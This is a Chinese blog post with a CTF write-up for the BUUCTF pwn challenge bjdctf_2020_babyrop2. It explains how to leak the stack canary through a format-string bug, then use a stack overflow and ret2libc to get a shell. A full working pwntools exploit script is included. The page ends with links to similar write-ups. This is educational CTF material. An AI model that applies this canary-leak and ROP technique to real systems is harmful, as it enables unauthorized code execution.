【BUUCTF】bjdctf_2020_babyrop2

最新推荐文章于 2024-02-28 20:58:39 发布
最新推荐文章于 2024-02-28 20:58:39 发布
阅读量337 收藏 1
点赞数
分类专栏: PWN 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51251108/article/details/111992722
版权

【BUUCTF】bjdctf_2020_babyrop2

有canary
在这里插入图片描述
ida看下程序
在这里插入图片描述
有格式化漏洞,但有6格宽度限制
在这里插入图片描述
有栈溢出
在这里插入图片描述
思路:这题靠格式化字符串漏洞泄露出canary的地址
然后栈溢出,ret2libc
泄露方法:
一次一次试过去,找到我们输入的位置的偏移
然后这题里偏移+1就是canary了
在这里插入图片描述
然后就能把canary带出来,canary每次运行都不一样
所以要实时接收
在这里插入图片描述
一个程序不同函数的canary好像都相同

特别提醒自己在接收环节的处理
exp:

from pwn import*
r=remote('node3.buuoj.cn',26857)
elf=ELF('./bjdctf_2020_babyrop2')
libc=ELF('./libc-2.23.so')
context.log_level = 'debug'
context.arch = elf.arch
pop_rdi=0x400993
r.recvuntil('help u!\n')
r.sendline('%7$p')
r.recvuntil('0x')
canary=int(r.recv(16),16)
print hex(canary)
r.recvuntil('u story!\n')
pd1='a'*0x18+p64(canary)+'b'*8
pd1+=p64(pop_rdi)+p64(elf.got['puts'])+p64(elf.plt['puts'])+p64(elf.sym['vuln'])
r.send(pd1)
true=u64(r.recv(6).ljust(8,'\0'))
print hex(true)
base=true-libc.sym['puts']
print hex(base)
system=base+libc.sym['system']
binsh=base+0x18cd57
pd2='a'*0x18+p64(canary)+'b'*8+p64(pop_rdi)+p64(binsh)+p64(system)
r.send(pd2)
r.interactive()
Nq0inaen
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
get_started_3dsctf_2016|get_started_3dsctf_2016
12-11
网络安全逆向PWN题目,简单的栈溢出,虽然有后门函数,但同时又给了一定的限制条件,可以使用更复杂的ROP解法。该样本题解:https://blog.csdn.net/A951860555/article/details/111030289
BUUCTF逆向前八题
01-24
内容为BUUCTF里reserve的前八题自己的一些解题思路
[PWN][高级篇]ROP-ret2libc-32/64位实例 (共四个)
网络安全知识分享
03-28 4373
ROP-ret2libc-32实例 32位思路: 1、想办法调用execve("/bin/sh",null,null) 2、传入字符串/bin///sh 3、体统调用execve eax = 11 ebx = bin sh_addr ecx = 0 edx = 0 int 0x80 实例代码如下: 接下来我们检查保护 我们看到是有NX保护,没有canary和pie保护,我们使用ROP进行绕过。关键在于如何获取system 和 /bin/sh。 objdump -d -j .plt
tcache_tear记录
weixin_55190422的博客
12-16 116
老套路 64位,保护全开,所以这题需要先泄露canary的值然后ret2libc来解决。 1.malloc操作在输入数据时存在堆溢出 2.free操作没有将指针标量置0, 存在UAF漏洞 3.info操作输出bss段地址0x602060 处的数据 漏洞点: free后ptr变量没有置为零, 所以存在UAF漏洞 ...
字符串溢出(pwn溢出)--ret2libc
莫慌的博客
09-29 403
pwn入门
反思:泄露canary之后一定要记得处理掉多余的东西————[2021 鹤城杯]littleof
最新发布
m0_73858054的博客
02-28 756
这是一道libc类型的题目,应该是不难的,月余之前遇到。当时思路什么的都理清楚了,脚本也写出来了,结果死活获取不到shell…最后又重写了一遍才跑成功了。今天又想起来这件事儿,重新捋了一遍。终于是让我找到了原因!现在把这个原因记录下来,惊醒自己千万要注重细节,不要再犯这种错误。
buuctf bjdctf_2020_babyrop2做题笔记 格式化字符串漏洞
weixin_45441024的博客
12-10 211
buuctf bjdctf_2020_babyrop2做题笔记 from pwn import * from LibcSearcher import * proc_name = '/home/pwn/Desktop/bjdctf_2020_babyrop2' p = remote('node3.buuoj.cn', 27642) elf = ELF(proc_name) puts_plt=elf.plt['puts'] puts_got=elf.got['puts'] main=elf.sym['main'
[BUUCTF]PWN——wdb2018_guess(stack smashing--canary报错利用)
mcmuyanga的博客
03-14 1119
wdb2018_guess 例行检查,64位程序,开启了canary和nx 本地试运行一下,看看大概的情况 64位ida载入 存在溢出利用点,但是有canary保护,这边39行和41行的puts函数是写死的,没法用来接收泄露的信息,想到了利用canary的报错输出 在程序加了 carry 保护后,如果我们的输入覆盖了 carry ,程序就会报错,报错代码如下,可以看到,程序会执行 __stack_chk_fail 函数来打印 __libc_argv[0] 指针所指向的字符串(默认存储的是程序的名称)
buuctf pwn wp(第六波)学会绕过Canary保护
月阴荒的博客
04-22 605
canary保护,也被称为金丝雀
BugkuCTF-PWN题canary超详细讲解
am_03的博客
08-31 2160
知识点 小端序说明,数据在内存里是如何存储的?下表里数据都为16进制 解题流程 题目Hint:更新 LibcSeacher 的 libc-database checksec查看保护机制 0x28=40 0x10=16 0x29=41 0x300=768 0x2C=44 buf长度为48,而read读取长度为768 v5长度为520,而read读取长度为768 所以存在栈溢出漏洞 from pwn import * #sh = process('./pwn4_') #context.log_lev
BUUCTF【GUSESS】(利用canary报错信息ssp攻击)
weixin_51055545的博客
04-29 311
文章目录通过canary报错信息来解题(ssp攻击)前言:背景知识:检查保护:IDA分析:exp分析: 通过canary报错信息来解题(ssp攻击) 前言: ​ 我们知道栈溢出的基本原理是通过发送大量数据,溢出导致覆盖返回地址,劫持程序执行流,针对开启canary保护的题目,程序中存在gets()或类似这样的危险溢出函数,却又没其他洞的情况下,我们可以利用ssp攻击达到get flag,或get shell的目的. 背景知识: ​ 我们输入过多数据,导致栈溢出时,程序puts出来的报错信息同样是调用了__
[CTF]bjdctf_2020_babyrop2
m0_50819561的博客
10-07 384
格式化字符串漏洞+金丝雀绕过。 出现这种形式的,v2就是canary。 查看他在栈里的位置。 var_8就是canary。 利用格式化字符串漏洞。 %6$p表示输出第六个参数。 发现我们输入的东西在第六个参数的位置。 调试之后发现有一串随机的十六进制数字。这就是canary。由此可见,这个canary在第七个参数的位置。 于是我们先用格式话字符串泄露第七个参数位置上的内容,每一次进行栈溢出的时候把泄露出来的值填入即可。 代码如下: from pwn import * from LibcSearche
2020-HackIM_ctf_hackim-ctfwriteup_
09-28
这是hackim-ctf的writeup
2020YCBCTF:2020羊城杯官方writeup及
03-24
2020年 2020羊城杯官方writeup及源码 各个过渡的分散的writeup后续会逐步上传,所有转移的writeup已经汇总在wp文件夹下的writeup文件里面了!
BasicASM.s(BUUCTF
06-04
分析过程文件
bjdctf_2020_babyrop2-fmt-leak canary
个人笔记
04-10 384
这使得参数可以输出多次,使用多个格式说明符,以不同的顺序输出。本地libc下载:https://github.com/Yeuoly/buuctf_pwn/tree/master/bjdctf_2020_babyrop2。printf(“%p”, a) 用地址的格式打印变量 a 的值,printf(“%p”, &a) 打印变量 a 所在的地址。思路:aa相当于定位标识,format在格式化假参数6的位置,所以构造成。2,IDA静态分析,查看可以泄露canary的地方,否则只能爆破了。canary的位置:即。
bjdctf_2020_babyrop2
m0sway的博客
11-26 1309
bjdctf_2020_babyrop2 使用checksec查看: 开启了Canary和栈不可执行,这题看标题就知道是一题栈溢出构造rop链的题目,存在Canary就代表我们首先要做的就是获取到Canary的值。 拉进IDA中查看: main()函数中给了两个函数,首先看下gift(): printf(&format)这里就一个明显的格式化字符串漏洞,可通过该漏洞获取到Canary的值 Canary的值固定是rbp-8,so…用gdb调试可以看到就在我们输入的下方 用%7$p就可以拿到Can
pwn7第七关
qq_18823653的博客
04-03 381
前面几个懒得写了,直接第七个吧,溢出点和前面一样get()函数,112字节,保护只开了NX程序本身没有system(),也没有/bin/sh,且栈不可执行,用ROPgadget也没找到有用的语句,但是程序是动态链接的,运行时会加载so库,可以用put()泄露出put的真实地址,又因为ASLR随机化不了地址底12位,可以用put真实地址的底12位查询加载的那个版本的libc.so,以及确定libc的...
buuctf luky_guy
09-28
Luky库是一组抽象复杂操作的Java类,它提供了各种功能,包括网络操作,事件处理,加密,数据库处理,snmp监视,队列,信号量,解析器和XML处理程序等。根据提供的引用内容,无法直接了解到buuctf luky_guy的具体信息。如果您能提供更多关于buuctf luky_guy的背景信息,我可以尝试为您提供更准确的答案。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值